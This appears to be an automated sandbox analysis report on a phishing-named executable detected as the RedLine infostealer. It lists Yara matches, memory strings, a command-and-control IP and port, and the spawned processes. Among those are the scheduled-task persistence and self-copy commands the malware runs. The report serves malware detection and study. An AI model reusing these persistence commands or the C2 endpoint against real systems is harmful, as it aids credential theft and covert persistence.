                        Source: vbc.exe, 00000005.00000002.573337691.0000000007825000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.573780220.0000000007A27000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.580618835.000000000BB51000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.574018688.0000000007AF1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697578487.000000000708D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697970804.000000000720F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.704639232.000000000BE21000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.698300479.00000000073A6000.00000004.00000800.00020000.00000000.sdmp, tmpC52C.tmp.5.dr, tmp31D7.tmp.5.dr, tmpCB41.tmp.21.dr, tmp6032.tmp.21.dr, tmp2EB7.tmp.5.dr, tmp2F83.tmp.5.dr, tmp870.tmp.5.dr, tmp6A58.tmp.5.dr, tmp21C5.tmp.5.dr, tmp686D.tmp.21.dr, tmp30DC.tmp.5.dr, tmp2D4F.tmp.5.dr, tmpEFE7.tmp.5.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: vbc.exe, 00000005.00000002.573337691.0000000007825000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.573780220.0000000007A27000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.580618835.000000000BB51000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.574018688.0000000007AF1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697578487.000000000708D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697970804.000000000720F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.704639232.000000000BE21000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.698300479.00000000073A6000.00000004.00000800.00020000.00000000.sdmp, tmpC52C.tmp.5.dr, tmp31D7.tmp.5.dr, tmpCB41.tmp.21.dr, tmp6032.tmp.21.dr, tmp2EB7.tmp.5.dr, tmp2F83.tmp.5.dr, tmp870.tmp.5.dr, tmp6A58.tmp.5.dr, tmp21C5.tmp.5.dr, tmp686D.tmp.21.dr, tmp30DC.tmp.5.dr, tmp2D4F.tmp.5.dr, tmpEFE7.tmp.5.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: vbc.exe, 00000005.00000002.573337691.0000000007825000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.573780220.0000000007A27000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.580618835.000000000BB51000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.574018688.0000000007AF1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697578487.000000000708D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697970804.000000000720F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.704639232.000000000BE21000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.698300479.00000000073A6000.00000004.00000800.00020000.00000000.sdmp, tmpC52C.tmp.5.dr, tmp31D7.tmp.5.dr, tmpCB41.tmp.21.dr, tmp6032.tmp.21.dr, tmp2EB7.tmp.5.dr, tmp2F83.tmp.5.dr, tmp870.tmp.5.dr, tmp6A58.tmp.5.dr, tmp21C5.tmp.5.dr, tmp686D.tmp.21.dr, tmp30DC.tmp.5.dr, tmp2D4F.tmp.5.dr, tmpEFE7.tmp.5.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: vbc.exe, 00000005.00000002.573337691.0000000007825000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.573780220.0000000007A27000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.580618835.000000000BB51000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.574018688.0000000007AF1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697578487.000000000708D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697970804.000000000720F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.704639232.000000000BE21000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.698300479.00000000073A6000.00000004.00000800.00020000.00000000.sdmp, tmpC52C.tmp.5.dr, tmp31D7.tmp.5.dr, tmpCB41.tmp.21.dr, tmp6032.tmp.21.dr, tmp2EB7.tmp.5.dr, tmp2F83.tmp.5.dr, tmp870.tmp.5.dr, tmp6A58.tmp.5.dr, tmp21C5.tmp.5.dr, tmp686D.tmp.21.dr, tmp30DC.tmp.5.dr, tmp2D4F.tmp.5.dr, tmpEFE7.tmp.5.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: vbc.exe, vbc.exe, 00000005.00000000.471969251.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.471695644.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Data.exe, 0000000E.00000002.582345521.000000000368A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.692582557.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.565186728.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Data.exe, 0000001F.00000002.695577674.000000000393A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                        Source: vbc.exe, 00000005.00000002.573337691.0000000007825000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.573780220.0000000007A27000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.580618835.000000000BB51000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.574018688.0000000007AF1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697578487.000000000708D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697970804.000000000720F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.704639232.000000000BE21000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.698300479.00000000073A6000.00000004.00000800.00020000.00000000.sdmp, tmpC52C.tmp.5.dr, tmp31D7.tmp.5.dr, tmpCB41.tmp.21.dr, tmp6032.tmp.21.dr, tmp2EB7.tmp.5.dr, tmp2F83.tmp.5.dr, tmp870.tmp.5.dr, tmp6A58.tmp.5.dr, tmp21C5.tmp.5.dr, tmp686D.tmp.21.dr, tmp30DC.tmp.5.dr, tmp2D4F.tmp.5.dr, tmpEFE7.tmp.5.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                        Source: vbc.exe, 00000005.00000002.573337691.0000000007825000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.573780220.0000000007A27000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.580618835.000000000BB51000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.574018688.0000000007AF1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697578487.000000000708D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697970804.000000000720F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.704639232.000000000BE21000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.698300479.00000000073A6000.00000004.00000800.00020000.00000000.sdmp, tmpC52C.tmp.5.dr, tmp31D7.tmp.5.dr, tmpCB41.tmp.21.dr, tmp6032.tmp.21.dr, tmp2EB7.tmp.5.dr, tmp2F83.tmp.5.dr, tmp870.tmp.5.dr, tmp6A58.tmp.5.dr, tmp21C5.tmp.5.dr, tmp686D.tmp.21.dr, tmp30DC.tmp.5.dr, tmp2D4F.tmp.5.dr, tmpEFE7.tmp.5.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: vbc.exe, 00000005.00000002.573337691.0000000007825000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.573780220.0000000007A27000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.580618835.000000000BB51000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.574018688.0000000007AF1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697578487.000000000708D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697970804.000000000720F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.704639232.000000000BE21000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.698300479.00000000073A6000.00000004.00000800.00020000.00000000.sdmp, tmpC52C.tmp.5.dr, tmp31D7.tmp.5.dr, tmpCB41.tmp.21.dr, tmp6032.tmp.21.dr, tmp2EB7.tmp.5.dr, tmp2F83.tmp.5.dr, tmp870.tmp.5.dr, tmp6A58.tmp.5.dr, tmp21C5.tmp.5.dr, tmp686D.tmp.21.dr, tmp30DC.tmp.5.dr, tmp2D4F.tmp.5.dr, tmpEFE7.tmp.5.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.90:17910Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                        Source: unknownDNS traffic detected: queries for: api.ip.sb

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: 14.2.Data.exe.36a1f70.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 21.0.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 0.2.QUOTATION 061622.exe.383a150.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 21.0.vbc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 0.2.QUOTATION 061622.exe.3851f70.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 21.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 14.2.Data.exe.368a150.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 21.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 21.0.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 0.2.QUOTATION 061622.exe.3851f70.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 5.0.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 5.0.vbc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 14.2.Data.exe.36a1f70.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 21.0.vbc.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 14.2.Data.exe.368a150.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 0.2.QUOTATION 061622.exe.383a150.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Initial sample is a PE file and has a suspicious name
                        Source: initial sampleStatic PE information: Filename: QUOTATION 061622.exe
                        Source: QUOTATION 061622.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: 14.2.Data.exe.36a1f70.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 21.0.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 0.2.QUOTATION 061622.exe.383a150.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 21.0.vbc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 0.2.QUOTATION 061622.exe.3851f70.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 21.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 14.2.Data.exe.368a150.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 21.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 21.0.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 0.2.QUOTATION 061622.exe.3851f70.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 5.0.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 5.0.vbc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 14.2.Data.exe.36a1f70.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 21.0.vbc.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 14.2.Data.exe.368a150.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 0.2.QUOTATION 061622.exe.383a150.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeCode function: 0_2_02812C9F0_2_02812C9F
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeCode function: 0_2_0281AB7E0_2_0281AB7E
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeCode function: 0_2_04E200400_2_04E20040
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeCode function: 0_2_04E257E80_2_04E257E8
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeCode function: 0_2_04E293D90_2_04E293D9
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeCode function: 0_2_04E3AD280_2_04E3AD28
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeCode function: 0_2_04E3001F0_2_04E3001F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_09BF48F05_2_09BF48F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_09BF90D05_2_09BF90D0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_09BF55305_2_09BF5530
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_09BF77385_2_09BF7738
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_09BF77305_2_09BF7730
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0A8A89475_2_0A8A8947
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0A8A8C305_2_0A8A8C30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0A8A84405_2_0A8A8440
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0A8A15A85_2_0A8A15A8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0A8A68705_2_0A8A6870
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0AE0AAC05_2_0AE0AAC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0AE0A1B85_2_0AE0A1B8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0AE046F05_2_0AE046F0
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeCode function: 0_2_04E2B100 CreateProcessAsUserA,0_2_04E2B100
                        Source: QUOTATION 061622.exe, 00000000.00000002.481807848.0000000002831000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs QUOTATION 061622.exe
                        Source: QUOTATION 061622.exe, 00000000.00000002.482019923.000000000383A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs QUOTATION 061622.exe
                        Source: QUOTATION 061622.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: Data.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: QUOTATION 061622.exeVirustotal: Detection: 44%
                        Source: QUOTATION 061622.exeReversingLabs: Detection: 48%
                        Source: QUOTATION 061622.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\QUOTATION 061622.exe "C:\Users\user\Desktop\QUOTATION 061622.exe"
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\Desktop\QUOTATION 061622.exe" "C:\Users\user\AppData\Roaming\Data\Data.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Data\Data.exe C:\Users\user\AppData\Roaming\Data\Data.exe
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\AppData\Roaming\Data\Data.exe" "C:\Users\user\AppData\Roaming\Data\Data.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Data\Data.exe C:\Users\user\AppData\Roaming\Data\Data.exe
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /fJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\Desktop\QUOTATION 061622.exe" "C:\Users\user\AppData\Roaming\Data\Data.exeJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /fJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /fJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\AppData\Roaming\Data\Data.exe" "C:\Users\user\AppData\Roaming\Data\Data.exeJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /fJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeFile created: C:\Users\user\AppData\Roaming\DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\tmp4B03.tmpJump to behavior
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@25/40@4/1
                        Source: QUOTATION 061622.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
